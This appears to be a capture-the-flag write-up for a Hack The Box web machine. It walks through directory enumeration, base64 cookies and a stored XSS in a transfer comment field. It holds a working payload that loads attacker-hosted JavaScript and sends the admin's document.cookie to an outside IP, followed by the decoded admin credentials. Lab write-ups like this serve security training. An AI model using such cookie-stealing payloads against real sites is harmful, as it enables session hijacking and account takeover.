2 :80 :443 XSS > admin

http://bankrobber.htb/
e-coin website

$ gobuster dir -u http://bankrobber.htb -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,html,txt -t 80
===============================================================
/img                  (Status: 301) [Size: 338] [--> http://bankrobber.htb/img/]
/register.php         (Status: 200) [Size: 0]
/login.php            (Status: 302) [Size: 0] [--> index.php]
/index.php            (Status: 200) [Size: 8245]
/user                 (Status: 301) [Size: 339] [--> http://bankrobber.htb/user/]
/admin                (Status: 301) [Size: 340] [--> http://bankrobber.htb/admin/]
/link.php             (Status: 200) [Size: 0]
/css                  (Status: 301) [Size: 338] [--> http://bankrobber.htb/css/]
/js                   (Status: 301) [Size: 337] [--> http://bankrobber.htb/js/]
/examples             (Status: 503) [Size: 1060]
/generic.html         (Status: 200) [Size: 13343]
/notes.txt            (Status: 200) [Size: 133]
/logout.php           (Status: 302) [Size: 0] [--> index.php?msg=Succesfully logged out]
/elements.html        (Status: 200) [Size: 34812]
/licenses             (Status: 403) [Size: 1205]
/fonts                (Status: 301) [Size: 340] [--> http://bankrobber.htb/fonts/]
/phpmyadmin           (Status: 403) [Size: 1205]
/webalizer            (Status: 403) [Size: 1046]

http://bankrobber.htb/admin/
You're not authorized to view this page

http://bankrobber.htb/generic.html
Similar website (old); links not working.

http://bankrobber.htb/notes.txt
- Move all files from the default Xampp folder: TODO
- Encode comments for every IP address except localhost: Done
- Take a break..

# login page is on the index.php itself
# sends POST request 
# default creds admin:admin; nothing happens

# register is also on index.php
# sends POST request
# response
http://bankrobber.htb/index.php?msg=User%20created.

# login as kashz:kashz
POST /login.php HTTP/1.1
Host: bankrobber.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Origin: http://bankrobber.htb
DNT: 1
Connection: close
Referer: http://bankrobber.htb/index.php?msg=User%20created.
Upgrade-Insecure-Requests: 1

username=kashz&password=kashz&pounds=Submit+Query

# fetches /user/
GET /user/ HTTP/1.1
Host: bankrobber.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://bankrobber.htb/index.php?msg=User%20created.
DNT: 1
Connection: close
Cookie: id=8; username=a2FzaHo%3D; password=a2FzaHo%3D
Upgrade-Insecure-Requests: 1

# cookie is just b64.
# interesting js file is requested
GET /js/transfer.js HTTP/1.1
Host: bankrobber.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://bankrobber.htb/user/
Cookie: id=8; username=a2FzaHo%3D; password=a2FzaHo%3D
# transfer.js
//Start user functions
function transferEcoin(fromId,toId,amount,comment){
	var http = new XMLHttpRequest();
	var url = 'transfer.php';
	var params = 'fromId='+fromId+'&toId='+toId+'&amount='+amount+'&comment='+comment;
	http.open('POST', url, true);

	http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
	http.send(params);
}

function getVal(id){
		return document.getElementById(id).value;
}

function getData(){
	fromId = getVal("fromId");
	toId = getVal("toId");
	amount = getVal("amount");
	comment = getVal("comment");
	transferEcoin(fromId,toId,amount,comment);
	alert('Transfer on hold. An admin will review it within a minute.\nAfter that he will decide whether the transaction will be dropped or not.');
}
// End user function
// Start admin functions
function handleTransaction(status,id,from,to,amount){
	var http = new XMLHttpRequest();
	var url = 'handle.php';
	var params = 'status='+status+'&id='+id+'&from='+from+'&to='+to+'&amount='+amount;
	http.open('POST', url, true);

	http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
	http.send(params);
}
// End admin functions

# cant find the handle.php code.

$ gobuster dir -u http://bankrobber.htb/user -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,html,txt -t 80
===============================================================
/index.php            (Status: 200) [Size: 39]
/auth.php             (Status: 200) [Size: 39]
/transfer.php         (Status: 200) [Size: 39]

# nothing here
# no vhosts

# exploring transfer e-coin
POST /user/transfer.php HTTP/1.1
Host: bankrobber.htb
Cookie: id=8; username=a2FzaHo%3D; password=a2FzaHo%3D
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: https://bankrobber.htb
Dnt: 1
Referer: https://bankrobber.htb/user/
Te: trailers
Connection: close

fromId=8&toId=2&amount=10&comment=test
# then comes a popup
Transfer on hold. An admin will review it within a minute.\nAfter that he will decide whether the transaction will be dropped or not.

# as admin will review our transaction, maybe we can request a callback
# tried links, nothing

Trying XSS

<script src="http://10.10.16.7/"></script>

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.154 - - [30/Sep/2021 15:23:58] "GET / HTTP/1.1" 200 -

# we do get a callback
# tried using PayloadAllTheThings/XSS - was getting nothing.
# simple way - requested an .js file and executed it on server

# requesting .js file
| <script src='http://10.10.16.7/kashz.js'> </script>

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.154 - - [30/Sep/2021 15:30:38] code 404, message File not found
10.10.10.154 - - [30/Sep/2021 15:30:38] "GET /kashz.js HTTP/1.1" 404 -

# file: kashz.js
function cookie1() {
    var img = document.createElement("img");
    img.src = "http://IP/?cookie=" + document.cookie;
    document.body.appendChild(img);
}

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.154 - - [30/Sep/2021 15:35:58] "GET /kashz.js HTTP/1.1" 200 -
10.10.10.154 - - [30/Sep/2021 15:35:59] "GET /cookie?=username=YWRtaW4%3D;%20password=SG9wZWxlc3Nyb21hbnRpYw%3D%3D;%20id=1 HTTP/1.1" 404 -

# url-decode
GET /cookie?=username=YWRtaW4=; password=SG9wZWxlc3Nyb21hbnRpYw==; id=1 HTTP/1.1" 404
# base64 -d
admin:Hopelessromantic

Last updated